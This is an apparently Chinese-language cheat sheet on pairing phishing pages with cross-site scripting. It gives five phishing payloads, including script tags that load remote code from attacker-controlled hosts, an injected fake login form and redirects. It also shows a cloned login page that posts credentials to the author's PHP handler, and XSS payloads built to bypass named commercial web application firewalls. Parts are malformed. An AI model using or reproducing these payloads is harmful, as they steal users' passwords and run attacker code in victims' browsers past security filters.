钓鱼页面+xss结合使用
典型
cs+xss组合拳
5种钓鱼方法
//①
<script>alert(url)</script>
//②
<script src="http://192.168.56.132/pkxss/xfish/fish.php"></script>
//③html注入钓鱼
<script>alert(<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="phishing.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html>
)
</script>
//④重定向钓鱼
<script>document.location.href="http://www.baidu.com"</script>
//⑤iframe钓鱼
<iframe src="http://www.baidu.com" height="100%" width="100%"</iframe>
http://127.0.0.1/xsshack/login.php?id=<script src='http://127.0.0.1/xsshack/payload.js'></script>利用方法
钓鱼页面
扒下静态的登录页面,然后在该页面中利用from标签,将实际的登录地址更改为自己设置的后台的php文件
如
<!DOCTYPE html>
<html>
<meta charset="gbk">
<head>
<title>test </title>
</head>
<body background="kd2.jpg" style=" background-repeat:no-repeat; background-size:100% 100%; background-attachment:fixed;">
<p> </p>
#即设置界面后,进行交互控制php代
<form style="text-align:center" action="test.php" method="post">
用户: <input type="text" name="user" value="user"><br>
密码: <input type="password" name="mima" value="Mouse"><br>
<input type="submit" value="绑定">
</form>
<p style="text-align:center">点击"提交"按钮,表单数据将被发送到服务器上的“test.php”。</p>
</body>
</html>
xss绕过进阶
绕过思路
①加编码括号+变单引号进行绕过
<svg onload> 拦截
<svg > onload>不拦截
因此可以构建
<svg %26%2362 onload=alert`1`>#即进行编码>进行绕过
常用的三种绕厂商的
#云锁与百度云加速
<svg %26%2362 onload=alert`1`>
奇安信
<select autofocus onfocus=[2].find(alert)>
安全狗
<img src=# οnerrοr=alert`2`>
<input onfocus="document.body.appendChild(createElement('script')).src='//xss.xx/B6Bb'" autofocus>